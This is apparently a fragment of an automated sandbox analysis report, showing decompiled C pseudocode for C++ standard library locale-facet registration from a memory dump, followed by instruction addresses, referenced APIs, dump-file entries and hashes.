                                                                                                																																																										_t695 = _t601;
                                                                                                																																																										_t218 = _t695 + 0x10;
                                                                                                																																																										 *_t218 =  *(_t695 + 0x10) & 0x00000000;
                                                                                                																																																										__eflags =  *_t218;
                                                                                                																																																										 *((intOrPtr*)(_t695 + 0x14)) = 7;
                                                                                                																																																										 *_t695 = 0;
                                                                                                																																																										E00F8D9F3(_v68);
                                                                                                																																																										return _t695;
                                                                                                																																																									} else {
                                                                                                																																																										_t675 = _v16;
                                                                                                																																																										_v16 = _t675;
                                                                                                																																																										_v4 = 1;
                                                                                                																																																										E00F85472(_t675);
                                                                                                																																																										 *0xfb81fc();
                                                                                                																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t675 + 4))))();
                                                                                                																																																										 *0xfd0b1c = _t675;
                                                                                                																																																										goto L124;
                                                                                                																																																									}
                                                                                                																																																								} else {
                                                                                                																																																									_t675 = _t694;
                                                                                                																																																									goto L124;
                                                                                                																																																								}
                                                                                                																																																							}
                                                                                                																																																						} else {
                                                                                                																																																							_t674 = _v16;
                                                                                                																																																							_v16 = _t674;
                                                                                                																																																							_v4 = 1;
                                                                                                																																																							E00F85472(_t674);
                                                                                                																																																							 *0xfb81fc();
                                                                                                																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t674 + 4))))();
                                                                                                																																																							 *0xfd0ae8 = _t674;
                                                                                                																																																							goto L117;
                                                                                                																																																						}
                                                                                                																																																					} else {
                                                                                                																																																						_t674 = _t693;
                                                                                                																																																						goto L117;
                                                                                                																																																					}
                                                                                                																																																				}
                                                                                                																																																			} else {
                                                                                                																																																				_t673 = _v16;
                                                                                                																																																				_v16 = _t673;
                                                                                                																																																				_v4 = 1;
                                                                                                																																																				E00F85472(_t673);
                                                                                                																																																				 *0xfb81fc();
                                                                                                																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t673 + 4))))();
                                                                                                																																																				 *0xfd0b18 = _t673;
                                                                                                																																																				goto L110;
                                                                                                																																																			}
                                                                                                																																																		} else {
                                                                                                																																																			_t673 = _t692;
                                                                                                																																																			goto L110;
                                                                                                																																																		}
                                                                                                																																																	}
                                                                                                																																																} else {
                                                                                                																																																	_t672 = _v16;
                                                                                                																																																	_v16 = _t672;
                                                                                                																																																	_v4 = 1;
                                                                                                																																																	E00F85472(_t672);
                                                                                                																																																	 *0xfb81fc();
                                                                                                																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t672 + 4))))();
                                                                                                																																																	 *0xfd0afc = _t672;
                                                                                                																																																	goto L103;
                                                                                                																																																}
                                                                                                																																															} else {
                                                                                                																																																_t672 = _t691;
                                                                                                																																																goto L103;
                                                                                                																																															}
                                                                                                																																														}
                                                                                                																																													} else {
                                                                                                																																														_t671 = _v16;
                                                                                                																																														_v16 = _t671;
                                                                                                																																														_v4 = 1;
                                                                                                																																														E00F85472(_t671);
                                                                                                																																														 *0xfb81fc();
                                                                                                																																														 *((intOrPtr*)( *((intOrPtr*)( *_t671 + 4))))();
                                                                                                																																														 *0xfd0af8 = _t671;
                                                                                                																																														goto L96;
                                                                                                																																													}
                                                                                                																																												} else {
                                                                                                																																													_t671 = _t690;
                                                                                                																																													goto L96;
                                                                                                																																												}
                                                                                                																																											}
                                                                                                																																										} else {
                                                                                                																																											_t670 = _v16;
                                                                                                																																											_v16 = _t670;
                                                                                                																																											_v4 = 1;
                                                                                                																																											E00F85472(_t670);
                                                                                                																																											 *0xfb81fc();
                                                                                                																																											 *((intOrPtr*)( *((intOrPtr*)( *_t670 + 4))))();
                                                                                                																																											 *0xfd0af4 = _t670;
                                                                                                																																											goto L89;
                                                                                                																																										}
                                                                                                																																									} else {
                                                                                                																																										_t670 = _t689;
                                                                                                																																										goto L89;
                                                                                                																																									}
                                                                                                																																								}
                                                                                                																																							} else {
                                                                                                																																								_t669 = _v16;
                                                                                                																																								_v16 = _t669;
                                                                                                																																								_v4 = 1;
                                                                                                																																								E00F85472(_t669);
                                                                                                																																								 *0xfb81fc();
                                                                                                																																								 *((intOrPtr*)( *((intOrPtr*)( *_t669 + 4))))();
                                                                                                																																								 *0xfd0ae0 = _t669;
                                                                                                																																								goto L82;
                                                                                                																																							}
                                                                                                																																						} else {
                                                                                                																																							_t669 = _t688;
                                                                                                																																							goto L82;
                                                                                                																																						}
                                                                                                																																					}
                                                                                                																																				} else {
                                                                                                																																					_t668 = _v16;
                                                                                                																																					_v16 = _t668;
                                                                                                																																					_v4 = 1;
                                                                                                																																					E00F85472(_t668);
                                                                                                																																					 *0xfb81fc();
                                                                                                																																					 *((intOrPtr*)( *((intOrPtr*)( *_t668 + 4))))();
                                                                                                																																					 *0xfd0ae4 = _t668;
                                                                                                																																					goto L75;
                                                                                                																																				}
                                                                                                																																			} else {
                                                                                                																																				_t668 = _t687;
                                                                                                																																				goto L75;
                                                                                                																																			}
                                                                                                																																		}
                                                                                                																																	} else {
                                                                                                																																		_t667 = _v16;
                                                                                                																																		_v16 = _t667;
                                                                                                																																		_v4 = 1;
                                                                                                																																		E00F85472(_t667);
                                                                                                																																		 *0xfb81fc();
                                                                                                																																		 *((intOrPtr*)( *((intOrPtr*)( *_t667 + 4))))();
                                                                                                																																		 *0xfd0b10 = _t667;
                                                                                                																																		goto L68;
                                                                                                																																	}
                                                                                                																																} else {
                                                                                                																																	_t667 = _t686;
                                                                                                																																	goto L68;
                                                                                                																																}
                                                                                                																															}
                                                                                                																														} else {
                                                                                                																															_t666 = _v16;
                                                                                                																															_v16 = _t666;
                                                                                                																															_v4 = 1;
                                                                                                																															E00F85472(_t666);
                                                                                                																															 *0xfb81fc();
                                                                                                																															 *((intOrPtr*)( *((intOrPtr*)( *_t666 + 4))))();
                                                                                                																															 *0xfd0b14 = _t666;
                                                                                                																															goto L61;
                                                                                                																														}
                                                                                                																													} else {
                                                                                                																														_t666 = _t685;
                                                                                                																														goto L61;
                                                                                                																													}
                                                                                                																												}
                                                                                                																											} else {
                                                                                                																												_t665 = _v16;
                                                                                                																												_v16 = _t665;
                                                                                                																												_v4 = 1;
                                                                                                																												E00F85472(_t665);
                                                                                                																												 *0xfb81fc();
                                                                                                																												 *((intOrPtr*)( *((intOrPtr*)( *_t665 + 4))))();
                                                                                                																												 *0xfd0adc = _t665;
                                                                                                																												goto L54;
                                                                                                																											}
                                                                                                																										} else {
                                                                                                																											_t665 = _t684;
                                                                                                																											goto L54;
                                                                                                																										}
                                                                                                																									}
                                                                                                																								} else {
                                                                                                																									_t664 = _v16;
                                                                                                																									_v16 = _t664;
                                                                                                																									_v4 = 1;
                                                                                                																									E00F85472(_t664);
                                                                                                																									 *0xfb81fc();
                                                                                                																									 *((intOrPtr*)( *((intOrPtr*)( *_t664 + 4))))();
                                                                                                																									 *0xfd0b0c = _t664;
                                                                                                																									goto L47;
                                                                                                																								}
                                                                                                																							} else {
                                                                                                																								_t664 = _t683;
                                                                                                																								goto L47;
                                                                                                																							}
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t663 = _v16;
                                                                                                																						_v16 = _t663;
                                                                                                																						_v4 = 1;
                                                                                                																						E00F85472(_t663);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t663 + 4))))();
                                                                                                																						 *0xfd0ad8 = _t663;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t663 = _t682;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t662 = _v16;
                                                                                                																			_v16 = _t662;
                                                                                                																			_v4 = 1;
                                                                                                																			E00F85472(_t662);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t662 + 4))))();
                                                                                                																			 *0xfd0b08 = _t662;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t662 = _t681;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t661 = _v16;
                                                                                                																_v16 = _t661;
                                                                                                																_v4 = 1;
                                                                                                																E00F85472(_t661);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t661 + 4))))();
                                                                                                																 *0xfd0ad4 = _t661;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t661 = _t680;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t660 = _v16;
                                                                                                													_v16 = _t660;
                                                                                                													_v4 = 1;
                                                                                                													E00F85472(_t660);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t660 + 4))))();
                                                                                                													 *0xfd0b04 = _t660;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t660 = _t679;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t659 = _v16;
                                                                                                										_v16 = _t659;
                                                                                                										_v4 = 1;
                                                                                                										E00F85472(_t659);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t659 + 4))))();
                                                                                                										 *0xfd0af0 = _t659;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t659 = _t678;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t658 = _v16;
                                                                                                							_v16 = _t658;
                                                                                                							_v4 = 1;
                                                                                                							E00F85472(_t658);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t658 + 4))))();
                                                                                                							 *0xfd0ad0 = _t658;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t658 = _t677;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}















































                                                                                                0x00f87005
                                                                                                0x00f87005
                                                                                                0x00f8700c
                                                                                                0x00f87016
                                                                                                0x00f8701b
                                                                                                0x00f87026
                                                                                                0x00f8702a
                                                                                                0x00f87036
                                                                                                0x00f8703b
                                                                                                0x00f8703f
                                                                                                0x00f87084
                                                                                                0x00f87087
                                                                                                0x00f87093
                                                                                                0x00f87041
                                                                                                0x00f87043
                                                                                                0x00f87049
                                                                                                0x00f8704f
                                                                                                0x00f87057
                                                                                                0x00f8705a
                                                                                                0x00f87094
                                                                                                0x00f87099
                                                                                                0x00f8709a
                                                                                                0x00f870a1
                                                                                                0x00f870ab
                                                                                                0x00f870b0
                                                                                                0x00f870bb
                                                                                                0x00f870bf
                                                                                                0x00f870d0
                                                                                                0x00f870d2
                                                                                                0x00f870d4
                                                                                                0x00f87119
                                                                                                0x00f8711c
                                                                                                0x00f87128
                                                                                                0x00f870d6
                                                                                                0x00f870d6
                                                                                                0x00f870d8
                                                                                                0x00f870de
                                                                                                0x00f870e4
                                                                                                0x00f870ec
                                                                                                0x00f870ef
                                                                                                0x00f87129
                                                                                                0x00f8712e
                                                                                                0x00f8712f
                                                                                                0x00f87136
                                                                                                0x00f87140
                                                                                                0x00f87145
                                                                                                0x00f87150
                                                                                                0x00f87154
                                                                                                0x00f87165
                                                                                                0x00f87167
                                                                                                0x00f87169
                                                                                                0x00f871ae
                                                                                                0x00f871b1
                                                                                                0x00f871bd
                                                                                                0x00f8716b
                                                                                                0x00f8716b
                                                                                                0x00f8716d
                                                                                                0x00f87173
                                                                                                0x00f87179
                                                                                                0x00f87181
                                                                                                0x00f87184
                                                                                                0x00f871be
                                                                                                0x00f871c3
                                                                                                0x00f871c4
                                                                                                0x00f871cb
                                                                                                0x00f871d5
                                                                                                0x00f871da
                                                                                                0x00f871e5
                                                                                                0x00f871e9
                                                                                                0x00f871fa
                                                                                                0x00f871fc
                                                                                                0x00f871fe
                                                                                                0x00f87243
                                                                                                0x00f87246
                                                                                                0x00f87252
                                                                                                0x00f87200
                                                                                                0x00f87200
                                                                                                0x00f87202
                                                                                                0x00f87208
                                                                                                0x00f8720e
                                                                                                0x00f87216
                                                                                                0x00f87219
                                                                                                0x00f87253
                                                                                                0x00f87258
                                                                                                0x00f87259
                                                                                                0x00f87260
                                                                                                0x00f8726a
                                                                                                0x00f8726f
                                                                                                0x00f8727a
                                                                                                0x00f8727e
                                                                                                0x00f8728f
                                                                                                0x00f87291
                                                                                                0x00f87293
                                                                                                0x00f872d8
                                                                                                0x00f872db
                                                                                                0x00f872e7
                                                                                                0x00f87295
                                                                                                0x00f87295
                                                                                                0x00f87297
                                                                                                0x00f8729d
                                                                                                0x00f872a3
                                                                                                0x00f872ab
                                                                                                0x00f872ae
                                                                                                0x00f872e8
                                                                                                0x00f872ed
                                                                                                0x00f872ee
                                                                                                0x00f872f5
                                                                                                0x00f872ff
                                                                                                0x00f87304
                                                                                                0x00f8730f
                                                                                                0x00f87313
                                                                                                0x00f87324
                                                                                                0x00f87326
                                                                                                0x00f87328
                                                                                                0x00f8736d
                                                                                                0x00f87370
                                                                                                0x00f8737c
                                                                                                0x00f8732a
                                                                                                0x00f8732a
                                                                                                0x00f8732c
                                                                                                0x00f87332
                                                                                                0x00f87338
                                                                                                0x00f87340
                                                                                                0x00f87343
                                                                                                0x00f8737d
                                                                                                0x00f87382
                                                                                                0x00f87383
                                                                                                0x00f8738a
                                                                                                0x00f87394
                                                                                                0x00f87399
                                                                                                0x00f873a4
                                                                                                0x00f873a8
                                                                                                0x00f873b9
                                                                                                0x00f873bb
                                                                                                0x00f873bd
                                                                                                0x00f87402
                                                                                                0x00f87405
                                                                                                0x00f87411
                                                                                                0x00f873bf
                                                                                                0x00f873bf
                                                                                                0x00f873c1
                                                                                                0x00f873c7
                                                                                                0x00f873cd
                                                                                                0x00f873d5
                                                                                                0x00f873d8
                                                                                                0x00f87412
                                                                                                0x00f87417
                                                                                                0x00f87418
                                                                                                0x00f8741f
                                                                                                0x00f87429
                                                                                                0x00f8742e
                                                                                                0x00f87439
                                                                                                0x00f8743d
                                                                                                0x00f8744e
                                                                                                0x00f87450
                                                                                                0x00f87452
                                                                                                0x00f87497
                                                                                                0x00f8749a
                                                                                                0x00f874a6
                                                                                                0x00f87454
                                                                                                0x00f87454
                                                                                                0x00f87456
                                                                                                0x00f8745c
                                                                                                0x00f87462
                                                                                                0x00f8746a
                                                                                                0x00f8746d
                                                                                                0x00f874a7
                                                                                                0x00f874ac
                                                                                                0x00f874ad
                                                                                                0x00f874b4
                                                                                                0x00f874be
                                                                                                0x00f874c3
                                                                                                0x00f874ce
                                                                                                0x00f874d2
                                                                                                0x00f874e3
                                                                                                0x00f874e5
                                                                                                0x00f874e7
                                                                                                0x00f8752c
                                                                                                0x00f8752f
                                                                                                0x00f8753b
                                                                                                0x00f874e9
                                                                                                0x00f874e9
                                                                                                0x00f874eb
                                                                                                0x00f874f1
                                                                                                0x00f874f7
                                                                                                0x00f874ff
                                                                                                0x00f87502
                                                                                                0x00f8753c
                                                                                                0x00f87541
                                                                                                0x00f87542
                                                                                                0x00f87549
                                                                                                0x00f87553
                                                                                                0x00f87558
                                                                                                0x00f87563
                                                                                                0x00f87567
                                                                                                0x00f87578
                                                                                                0x00f8757a
                                                                                                0x00f8757c
                                                                                                0x00f875c1
                                                                                                0x00f875c4
                                                                                                0x00f875d0
                                                                                                0x00f8757e
                                                                                                0x00f8757e
                                                                                                0x00f87580
                                                                                                0x00f87586
                                                                                                0x00f8758c
                                                                                                0x00f87594
                                                                                                0x00f87597
                                                                                                0x00f875d1
                                                                                                0x00f875d6
                                                                                                0x00f875d7
                                                                                                0x00f875de
                                                                                                0x00f875e8
                                                                                                0x00f875ed
                                                                                                0x00f875f8
                                                                                                0x00f875fc
                                                                                                0x00f8760d
                                                                                                0x00f8760f
                                                                                                0x00f87611
                                                                                                0x00f87656
                                                                                                0x00f87659
                                                                                                0x00f87665
                                                                                                0x00f87613
                                                                                                0x00f87613
                                                                                                0x00f87615
                                                                                                0x00f8761b
                                                                                                0x00f87621
                                                                                                0x00f87629
                                                                                                0x00f8762c
                                                                                                0x00f87666
                                                                                                0x00f8766b
                                                                                                0x00f8766c
                                                                                                0x00f87673
                                                                                                0x00f8767d
                                                                                                0x00f87682
                                                                                                0x00f8768d
                                                                                                0x00f87691
                                                                                                0x00f876a2
                                                                                                0x00f876a4
                                                                                                0x00f876a6
                                                                                                0x00f876eb
                                                                                                0x00f876ee
                                                                                                0x00f876fa
                                                                                                0x00f876a8
                                                                                                0x00f876a8
                                                                                                0x00f876aa
                                                                                                0x00f876b0
                                                                                                0x00f876b6
                                                                                                0x00f876be
                                                                                                0x00f876c1
                                                                                                0x00f876fb
                                                                                                0x00f87700
                                                                                                0x00f87701
                                                                                                0x00f87708
                                                                                                0x00f87712
                                                                                                0x00f87717
                                                                                                0x00f87722
                                                                                                0x00f87726
                                                                                                0x00f87737
                                                                                                0x00f87739
                                                                                                0x00f8773b
                                                                                                0x00f87780
                                                                                                0x00f87783
                                                                                                0x00f8778f
                                                                                                0x00f8773d
                                                                                                0x00f8773d
                                                                                                0x00f8773f
                                                                                                0x00f87745
                                                                                                0x00f8774b
                                                                                                0x00f87753
                                                                                                0x00f87756
                                                                                                0x00f87790
                                                                                                0x00f87795
                                                                                                0x00f87796
                                                                                                0x00f8779d
                                                                                                0x00f877a7
                                                                                                0x00f877ac
                                                                                                0x00f877b7
                                                                                                0x00f877bb
                                                                                                0x00f877cc
                                                                                                0x00f877ce
                                                                                                0x00f877d0
                                                                                                0x00f87815
                                                                                                0x00f87818
                                                                                                0x00f87824
                                                                                                0x00f877d2
                                                                                                0x00f877d2
                                                                                                0x00f877d4
                                                                                                0x00f877da
                                                                                                0x00f877e0
                                                                                                0x00f877e8
                                                                                                0x00f877eb
                                                                                                0x00f87825
                                                                                                0x00f8782a
                                                                                                0x00f8782b
                                                                                                0x00f87832
                                                                                                0x00f8783c
                                                                                                0x00f87841
                                                                                                0x00f8784c
                                                                                                0x00f87850
                                                                                                0x00f87861
                                                                                                0x00f87863
                                                                                                0x00f87865
                                                                                                0x00f878aa
                                                                                                0x00f878ad
                                                                                                0x00f878b9
                                                                                                0x00f87867
                                                                                                0x00f87867
                                                                                                0x00f87869
                                                                                                0x00f8786f
                                                                                                0x00f87875
                                                                                                0x00f8787d
                                                                                                0x00f87880
                                                                                                0x00f878ba
                                                                                                0x00f878bf
                                                                                                0x00f878c0
                                                                                                0x00f878c7
                                                                                                0x00f878d1
                                                                                                0x00f878d6
                                                                                                0x00f878e1
                                                                                                0x00f878e5
                                                                                                0x00f878f6
                                                                                                0x00f878f8
                                                                                                0x00f878fa
                                                                                                0x00f8793f
                                                                                                0x00f87942
                                                                                                0x00f8794e
                                                                                                0x00f878fc
                                                                                                0x00f878fc
                                                                                                0x00f878fe
                                                                                                0x00f87904
                                                                                                0x00f8790a
                                                                                                0x00f87912
                                                                                                0x00f87915
                                                                                                0x00f8794f
                                                                                                0x00f87954
                                                                                                0x00f87955
                                                                                                0x00f8795c
                                                                                                0x00f87966
                                                                                                0x00f8796b
                                                                                                0x00f87976
                                                                                                0x00f8797a
                                                                                                0x00f8798b
                                                                                                0x00f8798d
                                                                                                0x00f8798f
                                                                                                0x00f879d4
                                                                                                0x00f879d7
                                                                                                0x00f879e3
                                                                                                0x00f87991
                                                                                                0x00f87991
                                                                                                0x00f87993
                                                                                                0x00f87999
                                                                                                0x00f8799f
                                                                                                0x00f879a7
                                                                                                0x00f879aa
                                                                                                0x00f879e4
                                                                                                0x00f879e9
                                                                                                0x00f879ea
                                                                                                0x00f879f1
                                                                                                0x00f879fb
                                                                                                0x00f87a00
                                                                                                0x00f87a0b
                                                                                                0x00f87a0f
                                                                                                0x00f87a20
                                                                                                0x00f87a22
                                                                                                0x00f87a24
                                                                                                0x00f87a69
                                                                                                0x00f87a6c
                                                                                                0x00f87a78
                                                                                                0x00f87a26
                                                                                                0x00f87a26
                                                                                                0x00f87a28
                                                                                                0x00f87a2e
                                                                                                0x00f87a34
                                                                                                0x00f87a35
                                                                                                0x00f87a3b
                                                                                                0x00f87a3c
                                                                                                0x00f87a3f
                                                                                                0x00f87a79
                                                                                                0x00f87a7e
                                                                                                0x00f87a82
                                                                                                0x00f87a86
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8a
                                                                                                0x00f87a8e
                                                                                                0x00f87a95
                                                                                                0x00f87a98
                                                                                                0x00f87aa1
                                                                                                0x00f87a41
                                                                                                0x00f87a41
                                                                                                0x00f87a44
                                                                                                0x00f87a48
                                                                                                0x00f87a4c
                                                                                                0x00f87a59
                                                                                                0x00f87a61
                                                                                                0x00f87a63
                                                                                                0x00000000
                                                                                                0x00f87a63
                                                                                                0x00f87a2a
                                                                                                0x00f87a2a
                                                                                                0x00000000
                                                                                                0x00f87a2a
                                                                                                0x00f87a28
                                                                                                0x00f879ac
                                                                                                0x00f879ac
                                                                                                0x00f879af
                                                                                                0x00f879b3
                                                                                                0x00f879b7
                                                                                                0x00f879c4
                                                                                                0x00f879cc
                                                                                                0x00f879ce
                                                                                                0x00000000
                                                                                                0x00f879ce
                                                                                                0x00f87995
                                                                                                0x00f87995
                                                                                                0x00000000
                                                                                                0x00f87995
                                                                                                0x00f87993
                                                                                                0x00f87917
                                                                                                0x00f87917
                                                                                                0x00f8791a
                                                                                                0x00f8791e
                                                                                                0x00f87922
                                                                                                0x00f8792f
                                                                                                0x00f87937
                                                                                                0x00f87939
                                                                                                0x00000000
                                                                                                0x00f87939
                                                                                                0x00f87900
                                                                                                0x00f87900
                                                                                                0x00000000
                                                                                                0x00f87900
                                                                                                0x00f878fe
                                                                                                0x00f87882
                                                                                                0x00f87882
                                                                                                0x00f87885
                                                                                                0x00f87889
                                                                                                0x00f8788d
                                                                                                0x00f8789a
                                                                                                0x00f878a2
                                                                                                0x00f878a4
                                                                                                0x00000000
                                                                                                0x00f878a4
                                                                                                0x00f8786b
                                                                                                0x00f8786b
                                                                                                0x00000000
                                                                                                0x00f8786b
                                                                                                0x00f87869
                                                                                                0x00f877ed
                                                                                                0x00f877ed
                                                                                                0x00f877f0
                                                                                                0x00f877f4
                                                                                                0x00f877f8
                                                                                                0x00f87805
                                                                                                0x00f8780d
                                                                                                0x00f8780f
                                                                                                0x00000000
                                                                                                0x00f8780f
                                                                                                0x00f877d6
                                                                                                0x00f877d6
                                                                                                0x00000000
                                                                                                0x00f877d6
                                                                                                0x00f877d4
                                                                                                0x00f87758
                                                                                                0x00f87758
                                                                                                0x00f8775b
                                                                                                0x00f8775f
                                                                                                0x00f87763
                                                                                                0x00f87770
                                                                                                0x00f87778
                                                                                                0x00f8777a
                                                                                                0x00000000
                                                                                                0x00f8777a
                                                                                                0x00f87741
                                                                                                0x00f87741
                                                                                                0x00000000
                                                                                                0x00f87741
                                                                                                0x00f8773f
                                                                                                0x00f876c3
                                                                                                0x00f876c3
                                                                                                0x00f876c6
                                                                                                0x00f876ca
                                                                                                0x00f876ce
                                                                                                0x00f876db
                                                                                                0x00f876e3
                                                                                                0x00f876e5
                                                                                                0x00000000
                                                                                                0x00f876e5
                                                                                                0x00f876ac
                                                                                                0x00f876ac
                                                                                                0x00000000
                                                                                                0x00f876ac
                                                                                                0x00f876aa
                                                                                                0x00f8762e
                                                                                                0x00f8762e
                                                                                                0x00f87631
                                                                                                0x00f87635
                                                                                                0x00f87639
                                                                                                0x00f87646
                                                                                                0x00f8764e
                                                                                                0x00f87650
                                                                                                0x00000000
                                                                                                0x00f87650
                                                                                                0x00f87617
                                                                                                0x00f87617
                                                                                                0x00000000
                                                                                                0x00f87617
                                                                                                0x00f87615
                                                                                                0x00f87599
                                                                                                0x00f87599
                                                                                                0x00f8759c
                                                                                                0x00f875a0
                                                                                                0x00f875a4
                                                                                                0x00f875b1
                                                                                                0x00f875b9
                                                                                                0x00f875bb
                                                                                                0x00000000
                                                                                                0x00f875bb
                                                                                                0x00f87582
                                                                                                0x00f87582
                                                                                                0x00000000
                                                                                                0x00f87582
                                                                                                0x00f87580
                                                                                                0x00f87504
                                                                                                0x00f87504
                                                                                                0x00f87507
                                                                                                0x00f8750b
                                                                                                0x00f8750f
                                                                                                0x00f8751c
                                                                                                0x00f87524
                                                                                                0x00f87526
                                                                                                0x00000000
                                                                                                0x00f87526
                                                                                                0x00f874ed
                                                                                                0x00f874ed
                                                                                                0x00000000
                                                                                                0x00f874ed
                                                                                                0x00f874eb
                                                                                                0x00f8746f
                                                                                                0x00f8746f
                                                                                                0x00f87472
                                                                                                0x00f87476
                                                                                                0x00f8747a
                                                                                                0x00f87487
                                                                                                0x00f8748f
                                                                                                0x00f87491
                                                                                                0x00000000
                                                                                                0x00f87491
                                                                                                0x00f87458
                                                                                                0x00f87458
                                                                                                0x00000000
                                                                                                0x00f87458
                                                                                                0x00f87456
                                                                                                0x00f873da
                                                                                                0x00f873da
                                                                                                0x00f873dd
                                                                                                0x00f873e1
                                                                                                0x00f873e5
                                                                                                0x00f873f2
                                                                                                0x00f873fa
                                                                                                0x00f873fc
                                                                                                0x00000000
                                                                                                0x00f873fc
                                                                                                0x00f873c3
                                                                                                0x00f873c3
                                                                                                0x00000000
                                                                                                0x00f873c3
                                                                                                0x00f873c1
                                                                                                0x00f87345
                                                                                                0x00f87345
                                                                                                0x00f87348
                                                                                                0x00f8734c
                                                                                                0x00f87350
                                                                                                0x00f8735d
                                                                                                0x00f87365
                                                                                                0x00f87367
                                                                                                0x00000000
                                                                                                0x00f87367
                                                                                                0x00f8732e
                                                                                                0x00f8732e
                                                                                                0x00000000
                                                                                                0x00f8732e
                                                                                                0x00f8732c
                                                                                                0x00f872b0
                                                                                                0x00f872b0
                                                                                                0x00f872b3
                                                                                                0x00f872b7
                                                                                                0x00f872bb
                                                                                                0x00f872c8
                                                                                                0x00f872d0
                                                                                                0x00f872d2
                                                                                                0x00000000
                                                                                                0x00f872d2
                                                                                                0x00f87299
                                                                                                0x00f87299
                                                                                                0x00000000
                                                                                                0x00f87299
                                                                                                0x00f87297
                                                                                                0x00f8721b
                                                                                                0x00f8721b
                                                                                                0x00f8721e
                                                                                                0x00f87222
                                                                                                0x00f87226
                                                                                                0x00f87233
                                                                                                0x00f8723b
                                                                                                0x00f8723d
                                                                                                0x00000000
                                                                                                0x00f8723d
                                                                                                0x00f87204
                                                                                                0x00f87204
                                                                                                0x00000000
                                                                                                0x00f87204
                                                                                                0x00f87202
                                                                                                0x00f87186
                                                                                                0x00f87186
                                                                                                0x00f87189
                                                                                                0x00f8718d
                                                                                                0x00f87191
                                                                                                0x00f8719e
                                                                                                0x00f871a6
                                                                                                0x00f871a8
                                                                                                0x00000000
                                                                                                0x00f871a8
                                                                                                0x00f8716f
                                                                                                0x00f8716f
                                                                                                0x00000000
                                                                                                0x00f8716f
                                                                                                0x00f8716d
                                                                                                0x00f870f1
                                                                                                0x00f870f1
                                                                                                0x00f870f4
                                                                                                0x00f870f8
                                                                                                0x00f870fc
                                                                                                0x00f87109
                                                                                                0x00f87111
                                                                                                0x00f87113
                                                                                                0x00000000
                                                                                                0x00f87113
                                                                                                0x00f870da
                                                                                                0x00f870da
                                                                                                0x00000000
                                                                                                0x00f870da
                                                                                                0x00f870d8
                                                                                                0x00f8705c
                                                                                                0x00f8705c
                                                                                                0x00f8705f
                                                                                                0x00f87063
                                                                                                0x00f87067
                                                                                                0x00f87074
                                                                                                0x00f8707c
                                                                                                0x00f8707e
                                                                                                0x00000000
                                                                                                0x00f8707e
                                                                                                0x00f87045
                                                                                                0x00f87045
                                                                                                0x00000000
                                                                                                0x00f87045
                                                                                                0x00f87043

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F8700C
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F87016
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • collate.LIBCPMT ref: 00F87050
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F87067
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F87087
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                • String ID:
                                                                                                • API String ID: 1007100420-0
                                                                                                • Opcode ID: 83a76acc4614ce9a0d21154fd206155d5e5f3c3de54fbe445c070509ea16545e
                                                                                                • Instruction ID: 3d9bada7946f28d0a93675e27d9da24eb438b4f4e53672406ca972d87da355db
                                                                                                • Opcode Fuzzy Hash: 83a76acc4614ce9a0d21154fd206155d5e5f3c3de54fbe445c070509ea16545e
                                                                                                • Instruction Fuzzy Hash: D701A1369002299BCB04FB64CC05BEEB761AF84760F24410AF4056B391DF78DE02AB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F871C4(void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
                                                                                                				signed int _v4;
                                                                                                				signed int _v16;
                                                                                                				char _v20;
                                                                                                				intOrPtr _v56;
                                                                                                				signed int _t189;
                                                                                                				void* _t348;
